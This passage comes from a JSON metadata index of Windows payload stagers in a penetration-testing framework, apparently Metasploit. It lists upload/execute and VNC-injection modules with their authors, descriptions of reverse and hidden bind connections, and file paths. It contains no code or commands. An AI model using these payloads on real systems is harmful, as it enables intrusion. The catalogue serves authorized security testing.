"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_nonx_tcp": {
"name": "Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/upexec/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_ord_tcp": {
"name": "Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/upexec/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp": {
"name": "Windows Upload/Execute, Reverse TCP Stager",
"full_name": "payload/windows/upexec/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_allports": {
"name": "Windows Upload/Execute, Reverse All-Port TCP Stager",
"full_name": "payload/windows/upexec/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_dns": {
"name": "Windows Upload/Execute, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/upexec/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_rc4": {
"name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/upexec/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_rc4_dns": {
"name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/upexec/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_uuid": {
"name": "Windows Upload/Execute, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/upexec/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_udp": {
"name": "Windows Upload/Execute, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/upexec/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_hidden_ipknock_tcp": {
"name": "VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/vncinject/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This source IP acts as the authentication check\n (note that it can be spoofed with tools like hping, so it is not a strong one). After the knock, the\n shellcode can be retrieved from any IP. Until then the socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_hidden_tcp": {
"name": "VNC Server (Reflective Injection), Hidden Bind TCP Stager",
"full_name": "payload/windows/vncinject/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection on a hidden port and deliver the stage (the VNC DLL, not a command shell) to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_ipv6_tcp": {
"name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/vncinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_ipv6_tcp_uuid": {
"name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/vncinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_named_pipe": {
"name": "VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/vncinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_nonx_tcp": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/vncinject/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_tcp": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/vncinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_tcp_rc4": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/vncinject/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/vncinject/bind_tcp_uuid": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/vncinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/find_tag": {
"name": "VNC Server (Reflective Injection), Find Tag Ordinal Stager",
"full_name": "payload/windows/vncinject/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Use an established connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_hop_http": {
"name": "VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager",
"full_name": "payload/windows/vncinject/reverse_hop_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"scriptjunkie <scriptjunkie@scriptjunkie.us>",
"bannedit <bannedit@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). \n Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n data/hop/hop.php to the PHP server you wish to use as a hop.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_hop_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_http": {
"name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/vncinject/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_http_proxy_pstore": {
"name": "VNC Server (Reflective Injection), Reverse HTTP Stager Proxy",
"full_name": "payload/windows/vncinject/reverse_http_proxy_pstore",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_http_proxy_pstore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_ipv6_tcp": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/vncinject/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_nonx_tcp": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/vncinject/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_ord_tcp": {
"name": "VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/vncinject/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager",
"full_name": "payload/windows/vncinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_allports": {
"name": "VNC Server (Reflective Injection), Reverse All-Port TCP Stager",
"full_name": "payload/windows/vncinject/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_dns": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (DNS)",
"full_name": "payload/windows/vncinject/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_rc4": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/vncinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_rc4_dns": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/vncinject/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_uuid": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/vncinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_udp": {
"name": "VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/vncinject/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
